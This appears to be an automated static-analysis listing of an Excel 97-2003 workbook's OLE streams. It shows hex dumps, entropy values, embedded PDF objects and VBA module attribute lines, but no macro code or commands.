Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 b5 77 74 04 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 985

General
Stream Path:	MBD0010AD51/_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 b5 77 a4 c3 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.2383985198771654
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . 3 } . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: MBD0010AD4D/\x1CompObj, File Type: data, Stream Size: 94

General
Stream Path:	MBD0010AD4D/\x1CompObj
CLSID:
File Type:	data
Stream Size:	94
Entropy:	4.345966460061678
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0010AD4D/\x1Ole, File Type: data, Stream Size: 62

General
Stream Path:	MBD0010AD4D/\x1Ole
CLSID:
File Type:	data
Stream Size:	62
Entropy:	2.7788384466112834
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 6 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 36 00

Stream Path: MBD0010AD4D/CONTENTS, File Type: PDF document, version 1.7, Stream Size: 20409

General
Stream Path:	MBD0010AD4D/CONTENTS
CLSID:
File Type:	PDF document, version 1.7
Stream Size:	20409
Entropy:	7.983582411785068
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 7 . % . 2 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 4 0 R . / A c r o F o r m 5 0 R . > > . e n d o b j . 9 0 o b j . < < . / F i l t e r / F l a t e D e c o d e . / L e n g t h 3 8 . > > . s t r e a m . . x + 2 7 2 3 7 U 0 . B . . s = # . 3 9 K ? @ % + . . . + . . e n d s t r e a m . e n d o b j . 1 1 0 o b j . < < . / T y p e / X O b j e c t . / S u b t y p e / I m a g e . / W i d t h 9 6 5 . / H e i g h t 5 4 3 . / B i t s P e r C o m p o
Data Raw:	25 50 44 46 2d 31 2e 37 0a 25 a7 e3 f1 f1 0a 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 34 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 35 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 39 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 2f 4c 65 6e 67 74 68 20 33 38 0a 3e 3e 0a 73 74

Stream Path: MBD0010AD4E/\x1CompObj, File Type: data, Stream Size: 94

General
Stream Path:	MBD0010AD4E/\x1CompObj
CLSID:
File Type:	data
Stream Size:	94
Entropy:	4.345966460061678
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0010AD4E/\x1Ole, File Type: data, Stream Size: 62

General
Stream Path:	MBD0010AD4E/\x1Ole
CLSID:
File Type:	data
Stream Size:	62
Entropy:	2.7788384466112834
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 5 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 35 00

Stream Path: MBD0010AD4E/CONTENTS, File Type: PDF document, version 1.7, 1 pages, Stream Size: 141190

General
Stream Path:	MBD0010AD4E/CONTENTS
CLSID:
File Type:	PDF document, version 1.7, 1 pages
Stream Size:	141190
Entropy:	7.918921120478072
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 7 . % . . 1 0 o b j . . < < / O u t l i n e s 5 0 R . . / P a g e s 2 0 R . . / N a m e s < < / D e s t s 4 0 R . . > > . . / T y p e / C a t a l o g . . > > . . e n d o b j . . 2 0 o b j . . < < / C o u n t 1 . . / K i d s [ 6 0 R ] . . / T y p e / P a g e s . . > > . . e n d o b j . . 3 0 o b j . . < < / C r e a t i o n D a t e ( D : 2 0 2 2 0 7 0 1 1 0 0 4 1 7 + 0 2 ' 0 4 ' ) . . / M o d D a t e ( D : 2 0 2 2 0 9 2 6 1 9 4 4 0 7 + 0 8 ' 0 0 '
Data Raw:	25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 4f 75 74 6c 69 6e 65 73 20 35 20 30 20 52 0d 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0d 0a 2f 4e 61 6d 65 73 20 3c 3c 2f 44 65 73 74 73 20 34 20 30 20 52 0d 0a 3e 3e 0d 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0d 0a 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 43 6f 75

Stream Path: MBD0010AD4F/\x1CompObj, File Type: data, Stream Size: 93

General
Stream Path:	MBD0010AD4F/\x1CompObj
CLSID:
File Type:	data
Stream Size:	93
Entropy:	4.2892020709435155
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0010AD4F/\x1Ole, File Type: data, Stream Size: 64

General
Stream Path:	MBD0010AD4F/\x1Ole
CLSID:
File Type:	data
Stream Size:	64
Entropy:	2.892622069467395
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 1 ! O b j e c t 6 9 1 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 53 68 65 65 74 31 21 4f 62 6a 65 63 74 20 36 39 31 00

Stream Path: MBD0010AD4F/CONTENTS, File Type: PDF document, version 1.4, 1 pages, Stream Size: 124841

General
Stream Path:	MBD0010AD4F/CONTENTS
CLSID:
File Type:	PDF document, version 1.4, 1 pages
Stream Size:	124841
Entropy:	7.657052848938946
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 4 . . % . . % . . % w P D F b y W P C u b e d G m b H V 3 . 5 4 x [ 0 ] . . % . . % . . 1 0 o b j . < < / T y p e / M e t a d a t a / S u b t y p e / X M L / L e n g t h 1 4 4 7 > > . . s t r e a m . < ? x p a c k e t b e g i n = " . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > . < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " 3 . 1 - 7 0 1 " > . < r d f : R D F x m l n s : r d f = " h t t p : / / w w w . w 3 .
Data Raw:	25 50 44 46 2d 31 2e 34 0d 0a 25 e2 e3 cf d3 0d 0a 25 0d 0a 25 77 50 44 46 20 62 79 20 57 50 43 75 62 65 64 20 47 6d 62 48 20 56 33 2e 35 34 78 5b 30 5d 0d 0a 25 0d 0a 25 0d 0a 31 20 30 20 6f 62 6a 0d 3c 3c 2f 54 79 70 65 2f 4d 65 74 61 64 61 74 61 2f 53 75 62 74 79 70 65 2f 58 4d 4c 2f 4c 65 6e 67 74 68 20 31 34 34 37 20 3e 3e 0d 0a 73 74 72 65 61 6d 0a 3c 3f 78 70 61 63 6b 65 74

Stream Path: MBD0010AD50/\x1CompObj, File Type: data, Stream Size: 93

General
Stream Path:	MBD0010AD50/\x1CompObj
CLSID:
File Type:	data
Stream Size:	93
Entropy:	4.2892020709435155
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0010AD50/\x1Ole, File Type: data, Stream Size: 64

General
Stream Path:	MBD0010AD50/\x1Ole
CLSID:
File Type:	data
Stream Size:	64
Entropy:	2.892622069467395
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 1 ! O b j e c t 6 9 0 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 53 68 65 65 74 31 21 4f 62 6a 65 63 74 20 36 39 30 00

Stream Path: MBD0010AD50/CONTENTS, File Type: PDF document, version 1.5, Stream Size: 66661

General
Stream Path:	MBD0010AD50/CONTENTS
CLSID:
File Type:	PDF document, version 1.5
Stream Size:	66661
Entropy:	7.946317330962055
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 5 . % . 2 0 o b j . < < . / P a g e s 4 0 R . / T y p e / C a t a l o g . / O u t p u t I n t e n t s 5 0 R . / M e t a d a t a 6 0 R . / A c r o F o r m 7 0 R . / V e r s i o n / 1 # 2 E 5 . > > . e n d o b j . 6 0 o b j . < < . / T y p e / M e t a d a t a . / S u b t y p e / X M L . / F i l t e r / F l a t e D e c o d e . / L e n g t h 4 5 4 . > > . s t r e a m . . x n 0 . . S X . 6 _ Q . U 4 : m Q . # c . . W M X T . . H > > . } \| . l . M . / . T
Data Raw:	25 50 44 46 2d 31 2e 35 0a 25 a7 e3 f1 f1 0a 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 50 61 67 65 73 20 34 20 30 20 52 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 4f 75 74 70 75 74 49 6e 74 65 6e 74 73 20 35 20 30 20 52 0a 2f 4d 65 74 61 64 61 74 61 20 36 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 37 20 30 20 52 0a 2f 56 65 72 73 69 6f 6e 20 2f 31 23 32 45 35 0a 3e 3e 0a 65 6e

Stream Path: MBD0010AD51/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD0010AD51/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0010AD51/\x5DocumentSummaryInformation, File Type: data, Stream Size: 708

General
Stream Path:	MBD0010AD51/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	708
Entropy:	3.6235698530352805
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00

Stream Path: MBD0010AD51/\x5SummaryInformation, File Type: data, Stream Size: 372

General
Stream Path:	MBD0010AD51/\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	372
Entropy:	2.882764232203768
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 44 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 06 00 00 00 c4 00 00 00 07 00 00 00 d0 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 ec 00 00 00

Stream Path: MBD0010AD51/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 97872

General
Stream Path:	MBD0010AD51/Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	97872
Entropy:	7.364630739316353
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 aa 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: MBD0010AD51/_VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 416

General
Stream Path:	MBD0010AD51/_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	416
Entropy:	5.32126484407899
Base64 Encoded:	True
Data ASCII:	I D = " { E 1 4 9 E 7 C 1 - F C 0 1 - 4 3 4 8 - B 7 3 5 - 0 F A 0 A F E 5 6 1 0 4 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F A F 8 2 A 7 0 E 6 7 4 E 6 7 4 E 6 7 4 E 6 7 4 " . . D P B = " B 2 B 0 6 2 3 8 1 B 3 9 1 B 3 9 1 B " . . G C = " 6 A 6 8 B A 8 0 7 3 8 1 7 3 8 1
Data Raw:	49 44 3d 22 7b 45 31 34 39 45 37 43 31 2d 46 43 30 31 2d 34 33 34 38 2d 42 37 33 35 2d 30 46 41 30 41 46 45 35 36 31 30 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65

Stream Path: MBD0010AD51/_VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62

General
Stream Path:	MBD0010AD51/_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	62
Entropy:	3.0554671543224337
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00

Stream Path: MBD0010AD51/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2329

General
Stream Path:	MBD0010AD51/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2329
Entropy:	3.8405646415341126
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: MBD0010AD51/_VBA_PROJECT_CUR/VBA/dir, File Type: PDP-11 UNIX/RT ldp, Stream Size: 517

General
Stream Path:	MBD0010AD51/_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:	PDP-11 UNIX/RT ldp
Stream Size:	517
Entropy:	6.295528215964339
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . e 6 g . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
Data Raw:	01 01 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 af 65 36 67 17 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Stream Path: MBD0010AD52/\x1CompObj, File Type: data, Stream Size: 99

General
Stream Path:	MBD0010AD52/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0010AD52/Package, File Type: Microsoft Excel 2007+, Stream Size: 7942

General
Stream Path:	MBD0010AD52/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	7942
Entropy:	6.567858865491943
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . X V . ` . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
